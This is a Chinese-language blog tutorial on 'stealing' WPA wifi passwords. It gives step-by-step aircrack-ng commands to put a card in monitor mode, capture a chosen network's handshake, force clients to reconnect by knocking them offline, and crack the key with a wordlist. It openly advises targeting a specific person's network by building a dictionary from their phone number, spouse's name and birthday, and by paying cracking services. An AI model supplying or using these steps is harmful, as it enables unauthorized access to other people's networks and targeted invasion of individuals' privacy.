wifi渗透:盗wifi密码1.0

现在90%的wifi都是采用的wpa的认证保护方式,我只见过一个用wep的,所以我们先把骨头扔一边,先来啃一下这块牛肉。

WPA :Wi-Fi Protected Access,中文译名为Wi-Fi网络安全存取,WPA可保证WLAN用户的数据受到保护,并且只有授权的网络用户才可以访问WLAN网络。

每个制度都有他的漏洞

我们先来讲一下最常见的破解方式,使用aircrack套件来抓包跑字典


                                               搭建环境

1.一台路由器,使用wpa加密

2.kali系统

3.无线网卡


                                                开始实现

1.加载网卡进入虚拟机

2.输入ifconfig -a

发现wlan0,说明网卡加载成功,不一定名字非得是这个才行,加载成功了就ok

3.输入airmon-ng start wlan0,打开混杂模式

wifi渗透:盗wifi密码1.0_第1张图片

系统说让我们关一下那些进程,那我们就关一下

4.输入airodump-ng wlan0mon查看一些周围无线网络状况,找到我们要攻击的网络,记录BSSID和CH

wifi渗透:盗wifi密码1.0_第2张图片

今天用110来试试手,bssid:C8:3A:35:2B:B0:88,ch:8

ctrl+c结束此过程

5.输入airodump-ng -c 8 --bssid C8:3A:35:2B:B0:88 -w /root wlan0mon

kali的命令行下是区分大小写的。

wifi渗透:盗wifi密码1.0_第3张图片

出现右上角的那个说明抓包成功,包是以.cap结尾的

6.把包从计算机中移到主文件夹下,现在开始跑字典

输入aircrack-ng  -w /usr/share/wordlists/fasttrack.txt ~/root-01.cap

wifi渗透:盗wifi密码1.0_第4张图片
这就是我们跑出来的的wifi密码

参数:

-w:指定字典,现在最新的2017版kali下有很多字典,你也可以自己做字典上传上去

前面的是字典路径,后面的是刚刚抓的wpa连接包的路径。有时候你找不到他或者不知道他的路径,你就移到主文件夹下,主文件夹的路径为/root

其中有时候你很长时间抓不到他的握手包,你可以用我们之前学过的各种断网命令,断一下然后他就会重新握手。




                                         实验总结

其实跑字典是很不明智的,不仅靠字典的强大,更要有强大的计算机和一点点的运气成分,如果wifi密码设成15df#$326ryyu&*$2这种的,数字加字母加特殊符号十几位的,很难被破出来。

如果实在要破解一个人的wifi,先搜集信息,手机号,爱人姓名,生日,再加上常规的一些弱密码做出来一个字典,先拿这个简易的字典跑一下,如果跑不出来,就去找一下网上的一些专业跑包组织,跑不出来不要钱,一般跑一个包也就要10元钱。

之后我会说一些社会工程学盗wifi密码的,人性是系统中最薄弱的环节

闲着无聊去看一下米特尼克的事迹吧很传奇的一个人他还有一本书《欺骗的艺术》,我看着里面的各种吹逼,看一半就看不下去了,跳着看完了,但那就是人家的真实情景,所以我是服服帖帖的没话说....还有一本书《社会工程学2》,从淘宝上买影印版的,这个是个中国人写的书,符合中国国情,直接搬过来都能用。

你可能感兴趣的:(wifi渗透:盗wifi密码1.0)